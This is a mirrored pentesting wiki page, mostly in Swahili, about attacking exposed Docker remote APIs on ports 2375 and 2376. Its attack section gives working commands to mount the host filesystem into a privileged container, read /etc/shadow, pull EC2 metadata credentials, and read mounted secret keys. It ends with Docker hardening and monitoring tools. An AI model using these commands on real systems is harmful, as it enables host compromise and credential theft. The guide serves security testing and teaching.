mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
316 lines
20 KiB
Markdown
316 lines
20 KiB
Markdown
# 2375, 2376 Pentesting Docker
|
||
|
||
{{#include ../banners/hacktricks-training.md}}
|
||
|
||
### Msingi wa Docker
|
||
|
||
#### Nini
|
||
|
||
Docker ni **jukwaa la mbele** katika **sekta ya uhamasishaji**, likiongoza **uvumbuzi endelevu**. Inarahisisha uundaji na usambazaji wa programu, kuanzia **za jadi hadi za kisasa**, na kuhakikisha **kupelekwa salama** kwao katika mazingira mbalimbali.
|
||
|
||
#### Msingi wa usanifu wa docker
|
||
|
||
- [**containerd**](http://containerd.io): Hii ni **muda wa msingi** kwa ajili ya kontena, ikihusika na **usimamizi wa maisha ya kontena**. Hii inajumuisha kushughulikia **uhamasishaji na uhifadhi wa picha**, pamoja na kusimamia **utekelezaji, ufuatiliaji, na mtandao** wa kontena. **Maelezo zaidi** kuhusu containerd yanachunguzwa **zaidi**.
|
||
- **container-shim** ina jukumu muhimu kama **katikati** katika kushughulikia **kontena zisizo na kichwa**, ikichukua kwa urahisi kutoka **runc** baada ya kontena kuanzishwa.
|
||
- [**runc**](http://runc.io): Inajulikana kwa uwezo wake wa **muda wa kontena mwepesi na wa ulimwengu wote**, runc inalingana na **kiwango cha OCI**. Inatumika na containerd ku **anzisha na kusimamia kontena** kulingana na **miongozo ya OCI**, ikiwa imekua kutoka kwa **libcontainer** ya awali.
|
||
- [**grpc**](http://www.grpc.io) ni muhimu kwa **kuwezesha mawasiliano** kati ya containerd na **docker-engine**, kuhakikisha **mawasiliano yenye ufanisi**.
|
||
- [**OCI**](https://www.opencontainers.org) ni muhimu katika kudumisha **viwango vya OCI** kwa muda wa utekelezaji na picha, huku toleo jipya la Docker likiwa **linafuata viwango vya picha na muda wa OCI**.
|
||
|
||
#### Amri za msingi
|
||
```bash
|
||
docker version #Get version of docker client, API, engine, containerd, runc, docker-init
|
||
docker info #Get more infomarion about docker settings
|
||
docker pull registry:5000/alpine #Download the image
|
||
docker inspect <containerid> #Get info of the contaienr
|
||
docker network ls #List network info
|
||
docker exec -it <containerid> /bin/sh #Get shell inside a container
|
||
docker commit <cotainerid> registry:5000/name-container #Update container
|
||
docker export -o alpine.tar <containerid> #Export container as tar file
|
||
docker save -o ubuntu.tar <image> #Export an image
|
||
docker ps -a #List running and stopped containers
|
||
docker stop <containedID> #Stop running container
|
||
docker rm <containerID> #Remove container ID
|
||
docker image ls #List images
|
||
docker rmi <imgeID> #Remove image
|
||
docker system prune -a
|
||
#This will remove:
|
||
# - all stopped containers
|
||
# - all networks not used by at least one container
|
||
# - all images without at least one container associated to them
|
||
# - all build cache
|
||
```
|
||
#### Containerd
|
||
|
||
**Containerd** ilitengenezwa mahsusi kutumikia mahitaji ya majukwaa ya kontena kama **Docker na Kubernetes**, miongoni mwa mengine. Inalenga **kurahisisha utekelezaji wa kontena** katika mifumo mbalimbali ya uendeshaji, ikiwa ni pamoja na Linux, Windows, Solaris, na mengine, kwa kubainisha kazi maalum za mfumo wa uendeshaji na wito wa mfumo. Lengo la Containerd ni kujumuisha tu vipengele muhimu vinavyohitajika na watumiaji wake, ikijitahidi kuondoa vipengele visivyohitajika. Hata hivyo, kufikia lengo hili kikamilifu kunatambuliwa kuwa changamoto.
|
||
|
||
Uamuzi muhimu wa muundo ni kwamba **Containerd haitunza mtandao**. Mtandao unachukuliwa kuwa kipengele muhimu katika mifumo iliyosambazwa, ikiwa na changamoto kama vile Software Defined Networking (SDN) na ugunduzi wa huduma ambazo zinatofautiana sana kutoka jukwaa moja hadi jingine. Hivyo, Containerd inacha masuala ya mtandao yachukuliwe na majukwaa inayoyasaidia.
|
||
|
||
Wakati **Docker inatumia Containerd** kuendesha kontena, ni muhimu kutambua kwamba Containerd inasaidia tu sehemu ya kazi za Docker. Kwa hakika, Containerd haina uwezo wa usimamizi wa mtandao ulio katika Docker na haisaidii kuunda makundi ya Docker moja kwa moja. Tofauti hii inaonyesha jukumu lililolengwa la Containerd kama mazingira ya utekelezaji wa kontena, ikitenga kazi maalum zaidi kwa majukwaa inayounganisha nayo.
|
||
```bash
|
||
#Containerd CLI
|
||
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
|
||
ctr images list #List images
|
||
ctr container create registry:5000/alpine:latest alpine #Create container called alpine
|
||
ctr container list #List containers
|
||
ctr container info <containerName> #Get container info
|
||
ctr task start <containerName> #You are given a shell inside of it
|
||
ctr task list #Get status of containers
|
||
ctr tasks attach <containerName> #Get shell in running container
|
||
ctr task pause <containerName> #Stop container
|
||
ctr tasks resume <containerName> #Resume cotainer
|
||
ctr task kill -s SIGKILL <containerName> #Stop running container
|
||
ctr container delete <containerName>
|
||
```
|
||
#### Podman
|
||
|
||
**Podman** ni injini ya kontena ya chanzo wazi inayofuata viwango vya [Open Container Initiative (OCI)](https://github.com/opencontainers), iliyotengenezwa na kudumishwa na Red Hat. Inajitofautisha na Docker kwa sifa kadhaa tofauti, hasa **mifumo isiyo na daemon** na msaada wa **kontena zisizo na root**, ikiruhusu watumiaji kuendesha kontena bila ruhusa za root.
|
||
|
||
Podman imeundwa kuwa na ufanisi na API ya Docker, ikiruhusu matumizi ya amri za Docker CLI. Ufanisi huu unapanuka hadi kwenye mfumo wake wa ikolojia, ambao unajumuisha zana kama **Buildah** kwa ajili ya kujenga picha za kontena na **Skopeo** kwa ajili ya operesheni za picha kama vile push, pull, na inspect. Maelezo zaidi kuhusu zana hizi yanaweza kupatikana kwenye [GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools).
|
||
|
||
**Mabadiliko Muhimu**
|
||
|
||
- **Mifumo**: Tofauti na mfano wa mteja-server wa Docker wenye daemon ya nyuma, Podman inafanya kazi bila daemon. Muundo huu unamaanisha kwamba kontena zinaendesha kwa ruhusa za mtumiaji anayezianza, kuboresha usalama kwa kuondoa hitaji la ufikiaji wa root.
|
||
- **Ushirikiano wa Systemd**: Podman inashirikiana na **systemd** ili kudhibiti kontena, ikiruhusu usimamizi wa kontena kupitia vitengo vya systemd. Hii inatofautiana na matumizi ya Docker ya systemd hasa kwa ajili ya kusimamia mchakato wa daemon wa Docker.
|
||
- **Kontena zisizo na Root**: Sifa muhimu ya Podman ni uwezo wake wa kuendesha kontena chini ya ruhusa za mtumiaji anayezindua. Njia hii inapunguza hatari zinazohusiana na uvunjaji wa kontena kwa kuhakikisha kwamba washambuliaji wanapata tu ruhusa za mtumiaji aliyeathirika, si ufikiaji wa root.
|
||
|
||
Njia ya Podman inatoa mbadala salama na rahisi kwa Docker, ikisisitiza usimamizi wa ruhusa za mtumiaji na ufanisi na mifumo ya kazi ya Docker iliyopo.
|
||
|
||
> [!TIP]
|
||
> Kumbuka kwamba kwa kuwa podman inakusudia kusaidia API sawa na docker, unaweza kutumia amri sawa na podman kama na docker kama vile:
|
||
>
|
||
> ```bash
|
||
> podman --version
|
||
> podman info
|
||
> pdoman images ls
|
||
> podman ls
|
||
> ```
|
||
|
||
### Taarifa za Msingi
|
||
|
||
API ya mbali inafanya kazi kwa default kwenye bandari 2375 wakati imewezeshwa. Huduma kwa default haitahitaji uthibitisho ikiruhusu mshambuliaji kuanzisha kontena cha docker chenye ruhusa. Kwa kutumia API ya mbali mtu anaweza kuunganisha mwenyeji / (directory ya root) kwenye kontena na kusoma/kandika faili za mazingira ya mwenyeji.
|
||
|
||
**Bandari ya default:** 2375
|
||
```
|
||
PORT STATE SERVICE
|
||
2375/tcp open docker
|
||
```
|
||
### Enumeration
|
||
|
||
#### Manual
|
||
|
||
Kumbuka kwamba ili kuhesabu API ya docker unaweza kutumia amri ya `docker` au `curl` kama katika mfano ufuatao:
|
||
```bash
|
||
#Using curl
|
||
curl -s http://open.docker.socket:2375/version | jq #Get version
|
||
{"Platform":{"Name":"Docker Engine - Community"},"Components":[{"Name":"Engine","Version":"19.03.1","Details":{"ApiVersion":"1.40","Arch":"amd64","BuildTime":"2019-07-25T21:19:41.000000000+00:00","Experimental":"false","GitCommit":"74b1e89","GoVersion":"go1.12.5","KernelVersion":"5.0.0-20-generic","MinAPIVersion":"1.12","Os":"linux"}},{"Name":"containerd","Version":"1.2.6","Details":{"GitCommit":"894b81a4b802e4eb2a91d1ce216b8817763c29fb"}},{"Name":"runc","Version":"1.0.0-rc8","Details":{"GitCommit":"425e105d5a03fabd737a126ad93d62a9eeede87f"}},{"Name":"docker-init","Version":"0.18.0","Details":{"GitCommit":"fec3683"}}],"Version":"19.03.1","ApiVersion":"1.40","MinAPIVersion":"1.12","GitCommit":"74b1e89","GoVersion":"go1.12.5","Os":"linux","Arch":"amd64","KernelVersion":"5.0.0-20-generic","BuildTime":"2019-07-25T21:19:41.000000000+00:00"}
|
||
|
||
#Using docker
|
||
docker -H open.docker.socket:2375 version #Get version
|
||
Client: Docker Engine - Community
|
||
Version: 19.03.1
|
||
API version: 1.40
|
||
Go version: go1.12.5
|
||
Git commit: 74b1e89
|
||
Built: Thu Jul 25 21:21:05 2019
|
||
OS/Arch: linux/amd64
|
||
Experimental: false
|
||
|
||
Server: Docker Engine - Community
|
||
Engine:
|
||
Version: 19.03.1
|
||
API version: 1.40 (minimum version 1.12)
|
||
Go version: go1.12.5
|
||
Git commit: 74b1e89
|
||
Built: Thu Jul 25 21:19:41 2019
|
||
OS/Arch: linux/amd64
|
||
Experimental: false
|
||
containerd:
|
||
Version: 1.2.6
|
||
GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb
|
||
runc:
|
||
Version: 1.0.0-rc8
|
||
GitCommit: 425e105d5a03fabd737a126ad93d62a9eeede87f
|
||
docker-init:
|
||
Version: 0.18.0
|
||
GitCommit: fec3683
|
||
```
|
||
Ikiwa unaweza **kuwasiliana na API ya mbali ya docker kwa kutumia amri ya `docker`** unaweza **kutekeleza** yoyote ya **docker** [**amri zilizozungumziwa hapo awali**](2375-pentesting-docker.md#basic-commands) ili kuingilia huduma hiyo.
|
||
|
||
> [!TIP]
|
||
> Unaweza `export DOCKER_HOST="tcp://localhost:2375"` na **kuepuka** kutumia parameter ya `-H` pamoja na amri ya docker
|
||
|
||
**Kuongeza mamlaka haraka**
|
||
```bash
|
||
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
|
||
```
|
||
**Curl**
|
||
|
||
Wakati mwingine utaona **2376** ikifanya kazi kwa **TLS** endpoint. Sijawahi kuweza kuungana nayo kwa mteja wa docker lakini inawezekana kufanya hivyo kwa curl.
|
||
```bash
|
||
#List containers
|
||
curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
|
||
#List processes inside a container
|
||
curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
|
||
#Set up and exec job to hit the metadata URL
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- [http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}']
|
||
#Get the output
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
|
||
# list secrets (no secrets/swarm not set up)
|
||
curl -s –insecure https://tlsopen.docker.socket:2376/secrets | jq
|
||
#Check what is mounted
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
|
||
#Get the output by starting the exec
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
|
||
#Cat the mounted secret
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
|
||
#List service (If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables)
|
||
curl -s –insecure https://tls-opendocker.socket:2376/services | jq
|
||
#Creating a container that has mounted the host file system and read /etc/shadow
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
|
||
curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
|
||
#Stop the container
|
||
curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop
|
||
#Delete stopped containers
|
||
curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
|
||
```
|
||
Ikiwa unataka maelezo zaidi kuhusu hili, maelezo zaidi yanapatikana mahali nilipokopa amri hizo: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
|
||
|
||
#### Automatic
|
||
```bash
|
||
msf> use exploit/linux/http/docker_daemon_tcp
|
||
nmap -sV --script "docker-*" -p <PORT> <IP>
|
||
```
|
||
### Kupenya
|
||
|
||
Katika ukurasa ufuatao unaweza kupata njia za **kutoroka kutoka kwa kontena la docker**:
|
||
|
||
{{#ref}}
|
||
../linux-hardening/privilege-escalation/docker-security/
|
||
{{#endref}}
|
||
|
||
Kwa kutumia hii inawezekana kutoroka kutoka kwa kontena, unaweza kuendesha kontena dhaifu kwenye mashine ya mbali, kutoroka kutoka kwake, na kupenya mashine:
|
||
```bash
|
||
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
|
||
cat /mnt/etc/shadow
|
||
```
|
||
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
|
||
|
||
### Kuinua Mamlaka
|
||
|
||
Ikiwa uko ndani ya mwenyeji anayetumia docker, unaweza [**kusoma habari hii kujaribu kuinua mamlaka**](../linux-hardening/privilege-escalation/index.html#writable-docker-socket).
|
||
|
||
### Kugundua siri katika kontena za Docker zinazotembea
|
||
```bash
|
||
docker ps [| grep <kubernetes_service_name>]
|
||
docker inspect <docker_id>
|
||
```
|
||
Angalia **env** (sehemu ya mabadiliko ya mazingira) kwa siri na unaweza kupata:
|
||
|
||
- Nywila.
|
||
- Ip’s.
|
||
- Bandari.
|
||
- Njia.
|
||
- Mengineyo… .
|
||
|
||
Ikiwa unataka kutoa faili:
|
||
```bash
|
||
docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
||
```
|
||
### Kulinda Docker yako
|
||
|
||
#### Kulinda usakinishaji na matumizi ya Docker
|
||
|
||
- Unaweza kutumia chombo [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) kukagua usakinishaji wako wa docker wa sasa.
|
||
- `./docker-bench-security.sh`
|
||
- Unaweza kutumia chombo [https://github.com/kost/dockscan](https://github.com/kost/dockscan) kukagua usakinishaji wako wa docker wa sasa.
|
||
- `dockscan -v unix:///var/run/docker.sock`
|
||
- Unaweza kutumia chombo [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) kuangalia haki ambazo kontena litakuwa nazo linapokimbizwa kwa chaguzi tofauti za usalama. Hii ni muhimu kujua athari za kutumia baadhi ya chaguzi za usalama kukimbiza kontena:
|
||
- `docker run --rm -it r.j3ss.co/amicontained`
|
||
- `docker run --rm -it --pid host r.j3ss.co/amicontained`
|
||
- `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
|
||
|
||
#### Kulinda Picha za Docker
|
||
|
||
- Unaweza kutumia picha ya docker ya [https://github.com/quay/clair](https://github.com/quay/clair) kufanya iweze kukagua picha zako nyingine za docker na kupata udhaifu.
|
||
- `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
|
||
- `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
|
||
|
||
#### Kulinda Dockerfiles
|
||
|
||
- Unaweza kutumia chombo [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) **kukagua Dockerfile yako** na kupata aina zote za makosa ya usanidi. Kila kosa la usanidi litapewa ID, unaweza kupata hapa [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) jinsi ya kuyarekebisha.
|
||
- `dockerfilelinter -f Dockerfile`
|
||
|
||
.png>)
|
||
|
||
- Unaweza kutumia chombo [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) **kukagua Dockerfile yako** na kupata aina zote za makosa ya usanidi.
|
||
- `dockerfilelint Dockerfile`
|
||
|
||
.png>)
|
||
|
||
- Unaweza kutumia chombo [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) **kukagua Dockerfile yako** na kupata aina zote za makosa ya usanidi.
|
||
- `dockerlint Dockerfile`
|
||
|
||
.png>)
|
||
|
||
- Unaweza kutumia chombo [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) **kukagua Dockerfile yako** na kupata aina zote za makosa ya usanidi.
|
||
- `hadolint Dockerfile`
|
||
|
||
.png>)
|
||
|
||
#### Kurekodi shughuli za kushangaza
|
||
|
||
- Unaweza kutumia chombo [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) kugundua **tabia za kushangaza katika kontena zinazoendesha**.
|
||
- Kumbuka katika kipande kinachofuata jinsi **Falco inavyokusanya moduli ya kernel na kuingiza**. Baada ya hapo, inapakua sheria na **kuanza kurekodi shughuli za kushangaza**. Katika kesi hii imegundua kontena 2 zenye haki, 1 kati yao ikiwa na mlima wa nyeti, na baada ya sekunde chache imegundua jinsi shell ilifunguliwa ndani ya moja ya kontena.
|
||
```bash
|
||
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
|
||
* Setting up /usr/src links from host
|
||
* Unloading falco-probe, if present
|
||
* Running dkms install for falco
|
||
|
||
Kernel preparation unnecessary for this kernel. Skipping...
|
||
|
||
Building module:
|
||
cleaning build area......
|
||
make -j3 KERNELRELEASE=5.0.0-20-generic -C /lib/modules/5.0.0-20-generic/build M=/var/lib/dkms/falco/0.18.0/build.............
|
||
cleaning build area......
|
||
|
||
DKMS: build completed.
|
||
|
||
falco-probe.ko:
|
||
Running module version sanity check.
|
||
modinfo: ERROR: missing module or filename.
|
||
- Original module
|
||
- No original module exists within this kernel
|
||
- Installation
|
||
- Installing to /lib/modules/5.0.0-20-generic/kernel/extra/
|
||
mkdir: cannot create directory '/lib/modules/5.0.0-20-generic/kernel/extra': Read-only file system
|
||
cp: cannot create regular file '/lib/modules/5.0.0-20-generic/kernel/extra/falco-probe.ko': No such file or directory
|
||
|
||
depmod...
|
||
|
||
DKMS: install completed.
|
||
* Trying to load a dkms falco-probe, if present
|
||
falco-probe found and loaded in dkms
|
||
2021-01-04T12:03:20+0000: Falco initialized with configuration file /etc/falco/falco.yaml
|
||
2021-01-04T12:03:20+0000: Loading rules from file /etc/falco/falco_rules.yaml:
|
||
2021-01-04T12:03:22+0000: Loading rules from file /etc/falco/falco_rules.local.yaml:
|
||
2021-01-04T12:03:22+0000: Loading rules from file /etc/falco/k8s_audit_rules.yaml:
|
||
2021-01-04T12:03:24+0000: Starting internal webserver, listening on port 8765
|
||
2021-01-04T12:03:24.646959000+0000: Notice Privileged container started (user=<NA> command=container:db5dfd1b6a32 laughing_kowalevski (id=db5dfd1b6a32) image=ubuntu:18.04)
|
||
2021-01-04T12:03:24.664354000+0000: Notice Container with sensitive mount started (user=<NA> command=container:4822e8378c00 xenodochial_kepler (id=4822e8378c00) image=ubuntu:modified mounts=/:/host::true:rslave)
|
||
2021-01-04T12:03:24.664354000+0000: Notice Privileged container started (user=root command=container:4443a8daceb8 focused_brahmagupta (id=4443a8daceb8) image=falco:latest)
|
||
2021-01-04T12:04:56.270553320+0000: Notice A shell was spawned in a container with an attached terminal (user=root xenodochial_kepler (id=4822e8378c00) shell=bash parent=runc cmdline=bash terminal=34816 container_id=4822e8378c00 image=ubuntu)
|
||
```
|
||
#### Monitoring Docker
|
||
|
||
Unaweza kutumia auditd kufuatilia docker.
|
||
|
||
### References
|
||
|
||
- [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
|
||
- [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||
|
||
{{#include ../banners/hacktricks-training.md}}
|